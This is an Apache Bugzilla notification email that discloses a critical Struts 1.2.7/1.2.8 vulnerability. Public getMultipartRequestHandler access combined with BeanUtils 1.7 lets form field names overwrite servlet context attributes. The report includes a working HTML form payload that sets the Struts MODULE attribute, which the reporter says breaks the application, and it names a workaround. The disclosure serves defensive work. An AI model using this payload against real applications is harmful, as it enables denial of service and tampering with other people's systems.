DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUGĀ· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=38534>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED ANDĀ· INSERTED IN THE BUG DATABASE.
http://issues.apache.org/bugzilla/show_bug.cgi?id=38534 Summary: DOS attack, application hack Product: Struts Version: 1.2.7 Platform: Other OS/Version: other Status: NEW Severity: critical Priority: P5 Component: Action AssignedTo: dev@struts.apache.org ReportedBy: [EMAIL PROTECTED] in ActionForm the method getMultipartRequestHandler() is public and gives access to the request, the implementation CommonsMultipartRequestHandler gives access to servletContext, and BeanUtils 1.7 gives the posibility to set an attribute in context. In othwer words the following html code hacks an application made with struts 1.2.7 and 1.2.8 and bean utils 1.7 <form method="post" enctype="multipart/form-data" action="http://whateverdotcom/x.do";> <input type="hidden" name="multipartRequestHandler.servlet.servletContext.attribute(org.apache.struts.action.MODULE)" value="exe"/> <input type="submit"/> </form> It was tested against 1.2.7 and beanutils 1.7 . The source code of 1.2.8 shows no change. An work arround is to use a prior 1.7 beanutils -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
